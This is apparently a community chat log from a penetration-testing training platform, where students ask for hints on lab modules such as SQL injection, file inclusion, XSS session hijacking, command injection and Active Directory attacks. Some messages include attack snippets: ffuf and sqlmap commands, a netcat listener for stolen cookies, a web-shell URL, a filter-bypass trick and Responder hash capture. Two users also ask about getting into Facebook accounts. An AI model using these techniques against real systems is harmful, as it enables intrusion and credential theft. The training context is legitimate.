#modules

You can.

Both should work

Awesome... im starting to feel smarter already . lol

@rough radish I will warn you, this module is difficult haha

Especially the skill assesment

But you can do it

@raven cairn all is to me, but, the measure of which I have learned something is whether or not it was obvious to me at first glance. (stole that quote from somewhere, lol)

.

There is no flag here. Get back to hacking!

so, this seems like cheating... i assume these are all in the same module i am learning

root@NIX02:/root# locate flag.txt
/root/cron_abuse/flag.txt
/root/kernel_exploit/flag.txt
/root/screen_exploit/flag.txt
root@NIX02:/root#

the idea is to practice each technique, its on the student to decide if they want to work through each technique or go through and submit flags just to get it done. some boxes will be presented like this because they are merely there for practicing the concepts shown in the module sections. skills assessment boxes are built more tightly

ok, I plan to practice. Priv Esc is a major week point for me. Besides I'm not buying cubes to cheat myself lol

ya I figured the majority of people would be here to practice and not just submit flags 🙂

I really like the File Inclusion module. I'm working on the final lab rn and it's really well done!

hello everyone

THIS QUESTION: " Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? (Write the extensions as '.ext', in alphabetical order separated by spaces ".ext1 .ext2 .ext3")"

i tried to do this : " ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://archive.68.183.45.211:31747/indexFUZZ"

but return with zero results ,why?

@proud sparrow Try running that same scan but against the other vhosts you found from the previous question. One of them should work.

i did man but its the same

listen i watched video on youtube i did the same as he did he was solving the same section same question but for me didnt find results like zero

now i tried to restart my pwn but now its worse its fucked up

i tried to start from the first question and nothing shows...i wanna show you

Hello, everyone. I am having trouble understanding the error messages that I am getting on the Web Requests module. I am trying to update one of the api entries to "flag", but I get either the "unknown field entry" error message or the ">"

It is supposed to be self-explanatory. I first tried: "curl -X PUT http://SERVER:PORT/api.php/city/flag because I assumed that the answer wanted me only to change the "city_name" field in the table. However, I got the "unknown field entry" error message. I don't know what that means. lol

@weary forum Can i see your command?

LFI module completed! Done the last assignment without help! Altough I'm still unsure when exactly the RCE worked. I can't reproduce it.

Is it one at the time command like with a php session poisoning?

Hi all, I am struggling to find the password for the first account of the broken authentication final module. I filtered out rockyou.txt based on the password requirements and got 40 password but none of them is allowing me to access that user. Could someone lend a hand?

@hallow otter DM me 🙂

Has anyone finished the Command Injections skills assessment? I'm at the point where I get a "Permission denied" error for my command and I'm not sure how to bypass this

@rotund gust it will take several techniques to effectively cat the flag. Maybe try first running a simple command like ls. I think if you just add some apostrophes it should work, i.e. l's'

I see, thank you so much as always

Hello guys

I have just completed the Hacking wordpress module, i am the skill assesment( final test)

The target box generated is not wordpress though, it looks more like bootstrap.

@rich sequoia try exploring the website, you should find a link to a vhost that is using wordpress

Hi guys,

Broken authentication, skill assessment.

Can anyone please give me any hints.
I found only two users(s** and g**) from message.php, i tried using all the different username wordlists.

I tried tampering session cookie, for support user, it gives me error that role is incorrect for the user.

I tried brute forcing registration form, i got few mores users that gets message, invalid usernames. I’m not sure if invalid username means they are existing users or not, i tried them on message page, does not work

I tried brute forcing password, after applying password policy to rockyou.txt. No password match for any of the user. Filtered pass list has about 18-20 passwords.

Could anyone point me to the right direction.

Thanks in advance.

@uncut stratus Did you use country codes to found usernames ?

Hey, I'm in the information gathering module attempting to enumerate the vhosts of www.inlanefreight.htb, I used the dnsrecon/namelist.txt file as my word list and it returned '1910' lines, I'm pretty sure I'm getting off on the wrong track, any guidance?

Hello all. Looking for some general guidance on Skills Assessment for Broken Authentication. I have escalated from ‘nobody’ and now attempting to escalate to the proper person to get to the admin panel. Have tried several different things, just curious if I am doing the right things or if I have generally missed the mark on what is expected. Anybody willing to help, DM me and I will let you know where I am at and what I have attempted thus far. Thanks!

I need assistance with sqlmap essentials case #3 cookie value (Id)
I run sqlmap -u "http://157.245.46.51:32390/case3.php" --cookie="I'd=1*" and I get some payloads but none of them show flag. I get one that dumps the entire table (32 rows) and another value at the bottom that I've tried to use as a cookie and i get error.

fuff

Figured it out. Just FYI

hi everyone! Is anyone having connectivity problems with the VPN for the new AD module? I get disconnected every 10seconds and can't interact with the machines

im not sure if the problemis on my end

i tripped over my ethernet cable the other day and im not sure if I messed up my hardware

speedtest seem to run fine ...

I'm struggling with the first question of the skills assessment for Using Web Proxies. It says I need to enable the button on the /lucky.php page. I have tried modifying the HTML with my inspect element tool, and that seems to activate the button, but I don't get any flag returned. I'm not sure how to utilize my web proxy tools for this question if they're relevant

DM me and we can work thru this

it took changing it 6 or 7 times for me to get the flag

I'll try that. It suggests finding a way to make modifying the page easier since multiple clicks are necessary. How might I go about doing that?

I think there is a way in repeater to automate it.

i tried to connect but it says resource temporaly unavailable

what should i do?

@lethal atlas can I ask u some?

of course

hi

hello

hello

???

whats your command to connect?

hi

ssh root@host

hello

i close my academy tab, i think its bug

thanks bro

is there anyone

Where's everybody

@everyone

hey

Where's everybody

@here

@here

@here @here @here

@everyone @everyone @everyone

https://tenor.com/view/the-misfit-at-demon-king-academy-maou-gakuin-no-futekigousha-arnos-voltegourde-anos-voldigoad-gif-18478124

what do you need friend?

++kick 871555635840446474

『ғʟʏ』Tuấn Anh ✈ got the boot!

I really want to chat with someone

I really want to chat with someone

i am sorry

That's not the way to do it. Do it again and you'll be banned from the server.

oh no

@high zinc

Yeah... that's one way to get yourself banned 😂

problem solved. I terminated the pwnbox instance and it solved the problem. I guess you cant have pwnbox on and be connected to the vpn

:D

the new AD module is so good :)

Hello, has someone has a problem to find the FQDN of the nameserver on the "Active Subdomain Enumeration" (module INFORMATION GATHERING - WEB EDITION ). Any admin could help me? I already put the IP of the box on my hosts but I am not allowed to find the nameserver of inlanefreight.htb

glad you're liking it! how far are you? strap yourself in for the 2 skills assessments, they're like doing 2 full mini AD-focused pentests 🙂

Is there any specific order I should do the modules in?

for the last exercice of the hydra module ||the one with Harry Potter||
How long is it suppose to take ? I use the username generator and cupp with only the Name and Lastname and reduce the wordlist according to the rule but I just take way too long...

dm me

start with the basics and work your way up or follow a Path but I think you should get the basics first

shouldnt take long. Its usually something in the password list creation that gets skipped over. DM me for help

Hey. im in the web attacks module at the bypassing encoded references section and abit stuck.
Im trying to follow along with the steps in the module but when I do, I dont get a post request as expected, I get a GET request instead without the info in to replay? any ideas what im doing wrong?

if you're an absolute beginner i'd start with Learning Process, Linux Fundamentals, Windows Fundamentals, Intro to Networking, Intro to Web Applications, Web Requests, Introduction to Python3, Setting Up, Information Gathering - Web Edition, Getting Started, and then the Junionr Penetration Tester path from start to finish. a few modules aren't done yet in that path but will be released soon. If you have fundamentals down and want to learn AD then Intro to AD followed by AD Enumeration and Attacks and then the AD Enumeration skill path. If you want to learn web and have fundamentals down then do the Bug Bounty path. it really depends on where you are starting from. hope that helps

i'm sure others can weigh in on their own journey too 🙂

Thank you very much 😄

any time!

I would also recommend doing the starting point machines while doing academy

when clicking a pdf you dont get a post request?

For the Command Injections - Identifying Filters Module ("Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is NOT blacklisted by the web application?") every answer I submit is rejected as invalid even though I've verified that the operator is correct multiple through Burp. Is there a particular format the answer needs to be submitted in? I've tried URL encoding it as well, but that still doesn't work.

@knotty falcon Yes , it is in the format of xxx-xxxx

well I am at 15min and still got nothing so...

Ok thank you, I'll give this a shot.

DM me and lets look at your list creations

The magic is in how you created the password lists

Still no luck in trying to get credit in that format. Can I DM you or can you be more specific?

Sure

Can anyone help me "Windows Privilege Escalation" module, "Interacting with Users" section?

The hint says "Look for interesting shares that are writable by our user.". I run "net share" command, saw shares and found out that "Department Shares" is writable. Double checked that with "accesschk" tool.

However, when trying to create a file @Inventory.scf in the root of the share it says I don't have rights. I'm stuck with the section 😦

@rustic sage my memory might be wrong, but i think there is a directory on the share called IT or something like that. Basically it's the only shared folder that you allowed to write to

Once you put the .scf file there you should be able to capture the hash with Responder

@west canopy when running "accesschk -s -w C:\Department Shares" it says that the only place where "htb-student" can write is the root of C:\Department Shares.

I'll try manually to create a file, but if that works out then it is strange why accesschk didn't show that

I actually just used file explorer to search through the shares

I'll try your way and will respond in few minutse

You were right, Public/IT is writable by htb-student, thanks 🙇‍♂️

However, the open question then, why accesschk -s didn't show that
That's the output for the folder where I was able to create a file by htb-student

.\accesschk64.exe -s -w 'C:\Department Shares\Public\IT\'

C:\Department Shares\Public\IT
  RW BUILTIN\Users
  RW WINLPE-SRV01\Administrator
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  RW WINLPE-SRV01\sccm_svc

Requesting assistance with "Predictable Reset Token" module, specifically confirmation of the +-1 second aspect of challenge 1

No, I get a GET request.

oh yeah, that is different than the examples. SOmetimes you cant follow along exactly

@hallow remnant DM me 🙂

Did you ever figure out the flag for case5 I also got the same result as you where it looks like another flag got mixed into also, is that supposed to be like that?

Hi all, tell me I'm on the Active Directory Enumeration and attack module, on the Privileged Access section. I have a problem with the Cypher Raw code. Is anyone blocked too?

@broken warren feel free to DM me I might be able to help

Hi, try the Match p2 only

I tried but it does not work. I was helped and I saw that the raw cypher code is not good. There are too many brackets.

anyone I can ask some about sql?

yes! I'm doing this module rn
I'm at reading file section

Hi

do you reach Union Clause section?

yes

did you do the question?

yes

ok.

Careful about posting too much explicit work; this might be more appropriate as a DM

sorry

agreed

Requesting assistance on the "Broken Authentication" -> "Bruteforcing Cookies" part 2; my understanding is that this question implies we leverage CyberChef. However, I don't recognize the schema that the cookie is employing (and presume that there are layers of encoding taking place to obfuscate the cookie's contents). Welcome guidance.

I really like the module. I´ve read through most of it but haven´t done any exercises. I was playing around with CME though, because it is a tool I need to be better acquainted with. So far, the content is incredible :)! I also really like the stories about irl pentest attack paths. I didn´t know you could use an SCF file with responder to capture an NTLMV2 hash! I think the module also complements the PEN-300 and CRTO really well. Knowing how to enumerate paths for lateral movement is something I wasn´t too well versed in( I always just clicked stuff on bloodhound and hoped the attack path would be in the graph)

Academy is my favorite learning platform for IT stuff, and I think this is my favorite module

:)

https://tenor.com/view/money-dollars-cash-rich-shut-up-and-take-my-money-gif-3555042

Did not try other alternatives as I don't know them yet, but i'm kind of addicted to complete all modules right now.

Y’all are burning through them! We’ve got loads more coming though

Cant wait!

Is there a way to receive update about them like a newsletter or email or something?

we do have a newsletter https://resources.hackthebox.eu/hack-the-box-newsletter-sign-up ...we don't always announce modules currently, but that should change soon

thanks!

can someone help with the web proxy module ive been lost for a few now and cant seem to move forward.

active subdomain enumeration been stuck on question one for toooo long anyone help?

Maybe I can help. Where are you stuck6

?*

i found the high level vuln i just cant seem to figure out how to use it

Oh, sorry I red web requests, I didn't do web proxies yet. But soon 😛

ahh okk

@rustic sage DM me 🙂

@vital bough I got you dawg !

nice

I'm stuck right at the beginning of sql injection final skills assessment. I'm trying to trigger an error to have a hint about the vuln to exploit, but nothing gives. This is surely not a blind injection. Any tip?

@sweet heron EDIT: I'm a doofus, I was thinking SQLMap Essentials. Sorry

I've red source of index.php and check every other file available. Even fuzz the /pages but nothing.

Ok, np

OMG does anyone thing they made the Linux Local Privilege Escalation final assessment too hard? I cant even get flag #1. Only a reference in the .bash_history file I'm pulling my hair out here

@rough radish Try searching for hidden files and folders inside /home/htb-student 🙂

Found it, I feel like a fool..... ok noted, don't exclude hidden items

I've been spoiled in finding a hidden webpage, but I can't access it. I can't found any hosntame to add to /etc/hosts and I also found it with ffuf. I can access the code just fine in burpsuite, but I'm only getting a white page on firefox (with no source-code). Resetting target doesn't work. What am I missing? (sqli module skills assignement)

still stuck

yes. But further.

dm

Is it on purpose that on the DCSync section the AD enumeration and attacks module, the host is not running ADWS, I did managed to do the tasks on the host, but I was not able to anything with the linux host where I was able to ssh in.

there was error with the secretsdump.py

and also built-in ad cmdlets did not work

Me again with "Windows Privilege Escalation" module and "Miscellaneous Techniques" section 🙂

I've managed to get the SYSTEM shell and using lazagne (I tried mimikatz as well) I get the hashdump of passwords. When trying to decrypt it with both john and hashcat, I'm not getting the cleartext password.

So the question is:

• what must be the user to which I need to grab the password? (it says nothing about username in the question there)
• am I missing something and I need to do something else?

P.S. there are some troubles with understanding the "Windows Privilege Escalation" course 😦 Would be great to have the content more "explained" there.

anyone here having a similar issue ? im trying to do the XSS session hijacking room and when entering IP all im getting is a black background

is that the Cross-site Scripting (XSS) module?

hi, i’m stuck on Login brute forcing Module in last section “skill Assesstment - service login” I try all combination of user and password with hydra but nothing I can’t find the credential I use cupp for generate password and username-anarchy for generate users. Any hint? Thank you

when you made your passsword list using cupp. did you select y on numbers, special characters and l33t?

nope

I would recreate your list then

I use that options but with only name and surname I have more than 70000 login tries, and I use regex for reduce the length of the wordlist

And username-anarchy generate me 15 usernames

hello everyone

who can give me a hint about how treat this question from SQL fundamentals module:

We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

basically, I need to understand how import what I guess is a variable {$coon} with PHP include command?

you need to find out which file is imported by looking for "include" or "require" and then get this file from the server and look into it. in there you will find your answer

1. follow the hint for this task verbatim. It is really good!
   1.5. make sure to use 1337
2. make sure that the passwords in the password list meet the company's password policy.
3. take the usernames you talked about and use Hydra to finish the task.

ok, thanks

your password list should be less than 6000

hi guys i need help

i cannot connect via ssh

im on htb-virtualmachine

what module and section is this?

its MYSQL - query results

i reset the target but same result

make sure your vpn is connected

i tried on htb-cloud where vpn is already connected

im leaving the course i think, gonna try another

hmmm I had some issues connecting this morning to a machine as well

its bug i suppose

that's MySQL not SSH

swap for the IP of your target

that mean i tried to connect via ssh, but it was just connecting through MySQL right?

i feel stupid xd

We are here to learn

Thank u dude

no dumb questions, purpose of Academy is to learn. even the module authors are constantly learning new stuff as we work 🙂

Alguien que me ayude con cuentas de Facebook?

no hay modules sobre facebook aqui.

jajaja

Hi guys,
The hint for the 4th flag in the LLPE skills assessment is not enough for my thick skull. It feels like I have tried everything for the last 24 hours
Any nudges' in the right direction would be a massive help.
Logging into the host-manager seems like a rabbit hole.
I have nmap scanned everything, including the barcode of the can of Pepsi on my desk!

wait no hints i may have figured this out

It's amazing what a bit of sleep will do.... got flag4

How am I supposed to do the phishing part of (XSS MODULE), when I cant listen to port 80, anyone have tips? - sudo nc -lvnp 80
retrying local 0.0.0.0:80 : Address already in use

change the port

kind of disappointed in the Server side attacks module skill assessment. spent about 3 days doing that module and i was able to grasp all the information. I love the part with the python exploitation. The module itself was amazing, def my second favorite one behind the file upload one.

im just a bit disappointed in the skill assessment. was able to finish it in like 5 minutes.

if something feels easy, it doesn't mean it's disappointing, but rather that you have not only learned the subject matter, but can use it appropriately

everything is easy if you know the solution

haha true, i feel that. i guess i am leveling up even though i still dont feel it

sorry for late reply, but yes it is the xss module

going to try and take my knowledge onto the mainsite now

try some of the recommended machines

oh trueeeee i forgot they recommend certain machines for what is taught in the module!

I'm not getting any traffic there since the code defaults for the port 80 as http, I'm unable to add the new port (let's say 21043) xss injection

you can modify the code to reflect the port you are using

sad that most of the machines are retired and I dont have VIP there

Got final flag #5 !!! the sense of pride I have right now!

I think it would be cool to have academy machines. Kinda like starting point but machines you unlock after completing certain mods.

yes

And instead of having the walk through, point people back to the mod, so if they needed to crack a password it would send them back to the module and section

Is there a simple way to force firefox not to add the http(S) there, I keep getting disconnected as it forces the S part

do you add the http yourself?

the only time i see id automatically add it is while using zap

in firefox settings you can disable the https only feature

I put 10.129.118.53/phishing/send.php and it adds https there

put http://10.129.118.53/phishing/send.php

For some reason, the flag I enter in sqlmap case 5 is not working (even after --no-cast with -T flag5). Any help?

I have this setting, and it keeps doing it

dm me

if you have yours set that way then it should not be doing that.

Hello friends

Hello there!

yo!

I'm hosting a php server and when I connect to it throught he /phishing/send.php, I get this error while listening, what am I doing wrong?
10.129.118.57:58680 [404]: (null) /phishing/index.php - No such file or directory
10.129.118.57:58680 Closing

And why is the port changing from the original command? - sudo php -S 0.0.0.0:21304
[Tue Apr 26 20:56:16 2022] PHP 7.4.21 Development Server (http://0.0.0.0:21304) started

So in the 10:129:118:58680 , the 58680 is the ephemeral port coming from the target I believe. It's just a random port number that the target is using, but it is still trying to reach your PHP server

Do you have an index.php file in your PHP server?

Even if I host as: sudo php -S 0.0.0.0:21304/phishing/index.php | I keep getting the error

Ya is the file in the same place you started your server?

─[eu-academy-2]─[10.10.14.201]─[htb-ac395349@pwnbox-base]─[/tmp/tmpserver]
└──╼ [★]$ ls
creds.txt index.php

If I set the page -> /phishing/send.php | and put 10.10.14.201/index.php | I get 200 okay, put nothing is written in creds.txt | if I put 10.10.14.201/phishing/index.php I get the error above

try taking the phishing part out and run the server from the same directory(local) as the index.php file

I remember this section took me a few tries to get it to work properly

I dont know what any of you guys are talking about.

Did you ask a question?

I mean im trying to get in to hacking or coding but have no idea how to

https://academy.hackthebox.com/dashboard

thats a good start, probably a better way to start that convo tho

whats convo

The attempt to get help or ask a question

its short for "conversation" 🙂

ok, thanks

ok

How are we suppose to know a vulnerable parameter uses non-standard boundaries like in sqlmap case 6? Without the hint which tells what prefix to use, how could I find out?

Good luck with getting started!

hey, does anyone know the release date for any of the Coming Soon modules?

Leaking the source code, manual enumeration, or fuzzing

how can i get into a lost facebook account

oh we have a program to get into facebook accounts

wont let me unlock a module wtf

screen just resizes

could be a browser problem, a cube problem, is the mod completed? Which mod is it?

Need some help in web attacks module, advanced file disclosure section question. Couldn't get the flag using provided dtd file (I changed the file entity to "file"///var/www/html/flag.php").

hey can u help me please?

i also get stuck in Blacklist Filters / File Upload Attacks

can anyone help please?

solved

me too. There is a lot of people complaining about this section. I wonder if they revised it.

I am trying to do the Skill Assessment in the Broken Authentication module. I have identified the (only?) other account and how to log into it using a cookie. How can I progress from here?

Fuzzing directories/accounts results in nothing new

could anyone provide advice/point in the right direction

Hey guys need hint on SHELLS & PAYLOADS (reverse shells chapter)

DM me and lets see where you are stuck

DM me

If you still need help DM me

I need some help with Burp Intruder, im stuck on the two last parts of assessing 'Using Web Proxies'-module

what question are you stuck on ?

Can I DM you so I dont spoil anything?

sure

I need someone to help me with buffer overflow in linux skills assessment. I am missing something. I can get a reverse shell but only as htb-student.

I am trying to do the windows priv esc skills assessment 1, but I am having issues with the command injection. It is only letting me execute certain commands and not those that I need to use.

I haven't done that specific module but it sounds like you are missing setting the user id to root.

You can DM me. Walk me through what you are doing.

@severe birch were you able to get a foothold?

got it

37 modules complete.

Nice bro

Heck yeah!

@lethal atlas what's next? 🙂

gonna run thru the windows buffer overload and finish out tier 0

then back to HTB to work on another machine.

Hathor?

not sure yet lol

Were you able to get this to work with just curl IP:port -H 'Authorization: Basic YWRtaW46YWRtaW4='? I am having the exact same problem you reported, but trimming the Copy as cURL request to only have this info didn't give me a flag

@swift cove Feel free to DM me if you're still stuck 🙂

I am stuck on last question of attacking web applications with ffuf -Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag? - I have used lots of wordlists - found many possible values - but all of them are returning "You don't have access!" - anybody DM me and give me a hint on what I am doing wrong and confirm the wordlists I have used are not good one? Thanks

@stiff tiger last question of the skills assessment?

yes last question of skills assessment.

@stiff tiger DM me 🙂

Any little hint on the sqlmap skills assessment? I didn't find any attack vector yet. I've intercepted all requests with burp and clicked a lot. No parameters found. Same with ffuf for pages, params, extensions, etc. I checked HTML code too. Search bars aren't working.

I must have missed something!

@sweet heron try adding an item to your cart and intercept the request , this should give you a clue as to the attack point

OK thanks a lot for the hint. Might've missed it cause I remember doing it! Once again, you save the day!

np! The actual attack takes a bit of fine tuning to make it work so if you get stuck feel free to DM me

@manic zealot the question may be solved using both methods shown in the section. If you couldn't solve it using one method then try the other

Also, as the question mentions, the flag is at /flag.php not in /var/www/html/flag.php

i might be stupid but i cant figure out the dang password for the Appointment
any help be great????

hellooo, im just curious if someone could help me with a http request question i have.

@wide torrent sure, what's up?

how do you move up and down dir in http

i can get 'ls' and other commands to work but im clearly blanking on how to move in and out of directories

So if we are doing a command injection against a website, we can't really navigate around and change our current working directory. The command we inject will always be inside the webroot.

is it ok if i share ss here

yea

so you could do ls+node_modules

and it would list everything inside that directory

ahh that makes alot of sense ty

but every command you run , you will always be at the same location

if that makes sense

yeah tahts where my issue was

i could not see how to show dir without moving

it's not like a Terminal where we can move around and change our current directory

so you need that + to chain commands together im guessing

yep

they might need to be URL encoded

no its been fine with plain text its just for the web proxies lab, the repeating requests section

@west canopy do you have a good cheat sheet or link for commands like this still having some issues

Not really, in the case of the web proxies module it is mostly just using linux commands to enumerate the file system

cat flag.txt , etc.

so if i wanted to move into a second dir ffrom node_modules what would i use

so if we found a directory inside of node_modules , we can just call it fake_directory

we would need to do: ls node_modules/fake_directory

ok sorry im still learning the syntax i really appreciate the help

np. Also i would suggest looking in the root directory.

For all of you bash experts . . .
I am performing a hashing function and then want to count the number of characters in the variable that contains the hashed value.
If I use number=${#var}, I get an error.
But, if I use number=$(echo $var | wc -c), I get the correct value.
Does anyone know why that is happening?

worked for me

hmm. I was working on the "Flow Control - Loop" question and when I used the ${#} it returned the following message:

*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
139916277388672:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:

try to google it may be u will find some way to solve it

is this one specific to any module

@feral gyro Thanks. My review of some of the literature on bash says that there are some sh implementations whose ${#var} doesn't work properly with multi-byte characters (would return the length in bytes instead of characters). Perhaps that was the issue. I guess I'll just stick with the longer function until I figure it out.

I need some help with the LFI, basic bypasses question.

Hi guys, anyone knows if we are able to reset our progress for a module, so that we can reattempt the challenges again?

👍

I believe if you go to the Dashboard and go to your completed modules, you can select the "Retake Module" button.

hey there, thanks for helping out! Got it ! 🙂

Excellent. For me retaking some of the modules would just be an exercise in frustration 🙂

ahhaa, Have to brush up those that I've not touched in months

Oh, the retake module doesn't reset the answered questions?

Yikes. Now why would they do that. Kinda defeats the purpose of retaking a module!

Ah, was thinking of attempting the challenges again without the answers

I was thinking they might've made some changes as some of my queries are correct but the answer is different from my previous attempted challenges

That sucks. Sounds like a good suggestion to make to HTB though. I guess they don't want to screw up people's progress on learning streams in the event they don't re-complete a retaken module.

That makes sense too.

Thanks for your help @plucky current !

np

@rough radish Feel free to dm me 🙂

Hello guys, I am doing SQL Map Essentials as my last module to finish the BASIC TOOLSET. I am now at the first task and I have the feeling that I have to do SQL-Injection module first that I am even able to do this module , is that right ? I literallty dont know where to start at the first task. I did the scan but dont know what to do after.

It is better to do sqlmap after completing sqli

it is my opinion

understanding how to perform manual sql injections before automating it , is quite good

I need assistance on sqlmap skills assessment, I can't even find where to start. I've used dev tools and found two jQuery with parameters. But those both fail, I can't seem to intercept requests through burp for the checkout or contact entries.

Hello, everyone. I am having problems with the "Web Requests" Module, specifically the CRUD part of the module. I am supposed to add "flag" to the city API, and then delete any city name, and then I am supposed to search for flag to retrieve the flag.

But this is what I am getting:

That's me searching for the flag after I updated and deleted a city

The question is: "First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag."

Any nudge on the command injection assessment? can't find the injection point!

dm me

If I remember correctly I had to delete more than one city

oh, ok. the instructions are unclear because it says that you should delete a city, but it doesn't say more than 1

so you had to remove it from /etc/hosts or did you have to change the IP everytime you reset? Was the scan fast for you when it worked?

For the Password Attacks - Network Services section is there a suggested user.list and password.list to use? Currently using rockyou.txt for passwords and top-usernames-shortlist.txt and it's already taking forever

Look in resources

It hasnt worked for me, but im guessing we are supposed to use those

You were right just downloaded the resources and unzipped it

@livid pier when you say it hasn't worked for you what do you mean by that? lol
Either all these password attacks are going to take forever or I am doing something wrong because I am still waiting on a username and password combo for the first question and it has been running for quite some time

I have the same problem you describe. additionally, i was doing the ssh attack and it wont ever finish. my box runs out of time.

I had this problem with other password cracking modules too.

Hi, my first hint: you don't have to solve the questions in the given order. One attack might work faster than others. (I've solved it in the give order and it worked with the lists from resources) Second hint: when you've found a valid login, what can you do to reduce the number of tries? Update: Have to correct my answer. I have used the password.list and an other one from the seclists folder

Anyone able to give me a hint on Active Directory Attacks "Attacking Domain Trusts - Child -> Parent Trusts From Linux"? I have read over the section and gone through the examples, I can get a system shell but I don't understand how I am supposed to get the hash for the BRoss user.

what do you mean by finding a valid login?

@west canopy try kerberoasting

oh actually i rememberd wrongly what i meant to say you have admin you can do dcsync

Are you saying if we find a valid login and password we can remove it from both lists?

Yes I've been awake so long time, I'm messing things kerberoast gives rc4 hash and dcsync gives you the ntlm straight away.. Anyway I'm going to sleep now 🙂

@shadow verge just solved it, thanks so much!

When you've found a valid login, you might find "something" to reduce either the users or the passwords. Not sure how much I can write here. But I'm sure you'll know what I mean when you think about it. Log in and look around a bit and you'll know what I've meant. Don't think to complicated. In case you still don't know what I've meant, feel free to write me a PM

Try adding an item to your cart and intercept the request , this should give a clue as to where to inject

No problem

anybody available to answer a question about the command injection skills assessment?

@neat snow i can try, what's up?

is there a way to run responder the tcp server other than port 80, i use the pwn boxes and it errors out bc port 80 is in use

Hey there
I am totally stuck in the Broken Authentication module, section Bruteforcing Cookies, the second question. I can't find a way to decrypt that cookie...
could somebody help me please?

hey yall, im just getting started and dont know how to add the VPN on mac?

openvpn isnt a command in macos so i cant add the configuration

@delicate lynx you're probably going to want a Kali or Parrot VM

if i cant use virtualbox, what should i use?

could try VMWare

or the browser-based Pwnbox

nobody?

Have you tried with sudo responder? You can turn off in responder.conf , but I’m not aware of any option to change the port….

yes i ran it with sudo, im assuming whats happening is bc the pwnbox runs over port 80 its interfears with the TCP server (ive had this same issues when trying to host web severs while using it). is it possible to turn off the TCP server function of Responder

responder.conf**

https://raw.githubusercontent.com/lgandx/Responder-Windows/master/binaries/Responder/Responder.conf. Http =Off

Should be under /etc , or /usr/share/responder/Responder.conf …

yes that worked appreciate it

so for the box i need to do a file inclusion and use the responder to authenticate. this issue is i cant listen over port 80 bc it shows busy ( im assuming bc its on pwn the box) . any ideas how i can work around this on pwnbox?

Not really, the only possibility would be use https for inclusion?

Hello I'm stuck on the loop Flow control question of the bash scripting module the loop i made works but i keep getting a decrypt error

error being :*** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. bad decrypt 140546881238400:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:

@sudden lotus feel free to DM me 🙂

You can add a domain xxx.htb to your /etc/hosts and the subdomain as well (yyy.xxx.htb) so your PC knows where to route. And make sure your ffuf command is run against the subdomain. I don't remember about the scan speed. DM me, I'll go check the module back because I don't remember a lot.

Pretty sure no, but does someone know if you can tell sqlmap to "import" scan results from another ip/port (the box run out before I finished the scan). Changing the dir name maybe?

Working the Bloodhound module... trying to import the new data from ILF_BH.zip - not working out so well. There is no bloodhound.dump file. Help please!

Hi guys, I have a comprehension issue with the Automated Scanning of the File Inclusion module question. When using FUFF utilizing the example provided, I only get things like " </avg>," etc. What in tarnation am I to do with that? Can someone give the command to scan either with FUFF or go buster so I can understand this?

What command did you use?

@sweet heron I PM-ed you so not to spoil anything for any one else

thanks man that's what I was missing I'm at the final assessment now

Good to hear, good job!

were you able to get the flag? I have no issue removing a city or changing a cities name to flag. I deleted like 3 cities, and still when I search for flag I see the same results {city name : flag, country: US} EDIT: Figured it out, I actually wasn't deleting. was using -x instead of -X facepalm

case matters lol

Hi guys. I have a problem with unlocking modules. I have enough credits but when I click "unlock" nothing happens. Any help?

Is it on purpose I can't run SharpHound at AD Enumeration and Attacks Skills assesment, I noticed ADWS is not running?

nvm I figured it out, firefox in kali vm didn't want to cooperate, probably something to do with js

Still stuck in broken auth bruteforcing cookies.... Could somebody help me? can't find that magic byte

hey all on the XSS session hijacking module.... my script.js is bang on, same with index.php... as per the information in module, but when im sending the request im just not getting the cookie....tried various times, even tried doing as a curl request, same thing.

Hi guys, I'm about to finish the Active Directory Enumeration Path. There is left just one question from the Active Directory LDAP module, which is "What non-default privilege does the htb-student user have?"
This was supposed to be the easiest question but nothing worked, I tried from simple "whoami /priv" to using BloodHound (which is not covered in the module) but I don't what else I need to do.
Could anyone help me?

I had the same problem. I had to use a HtB instance instead of a VM because of the BloodHound version

Hello all, im just starting out in the academy and im in the setting up module, specifically the windows section and trying to run the command "choco install pkg1 pkg2 pkg" however it always seem to fail:-

Everything has been successful up until this point, can anyone help please 🙂

Server-side Attacks

I guess I can try that. How do I sudo on the provided VM? I don’t have the password to the user account.

there is a file with the credentials on the desktop

Man - I’m a dope. Thank you so much!

And did you create SSH keys to get the files onto the pwnbox?

ok

I want change my name Suddenly I had this message

Can you dm me the content of script.js you are using?
I believe you need to set the same port inside script.js to fetch index.php (ie:5555) that your PHP server is listening on

contact customer support

Hey guys, i want do topen this link http://xxx.xxx.xxx.xxx:31039/profile_images/shell.phar jpg?cmd=id

but my browser decode it to:

http://xxx.xxx.xxx.xxx:31039/profile_images/shell.phar jpg?cmd=id

i cant open it

if i encode %20 with %2520 and use it in the link

i dont work

how can fix this

Can someone dm me about intro to assembly?
I'm stuck at skills assessment first question.

Still working the bloodhound module... having a hard time figuring out how to query groups with high privileges outside of Domain Admins. The question is: "Using the attached data find the most privileged group after the Domain Admins group."

Why append jpg with a space? What happens if you omit that part?

this is a command Injection against a Whitelists from Webserver which just allow specific file extensions

Hello, could somebody give me a little hint on the .zip-file decryption tasks in Password Attacks? I'm stuck at section "Protected Files" as well as on " Password Attacks Lab - Medium" and I wonder if I'm stuck at both for the same reason, because both involve zip-file cracking.

if anyone is available to assist me with the session hijacking portion of the XSS module please let me know

Were you able to extract the hash, using John?

yes, i have the hash, and i tried many wordlists, like rockyou, the one from the section resources, some mutations... but no hit 😦

If I remember correctly, you need to use the mutated list. I'll confirm when I get home

Try running your command from an elevated powershell 🙂

The bloodhound zip files provided in the VM did not work on my VM either, I had to use the pwnbox.

I had a buddy have the exact same issue... I'm tempted to think it's a network issue somehow. Are you on VM or Pwnbox?

hey, I'm kinda stuck at the Directory Indexing of Hacking WordPress module.

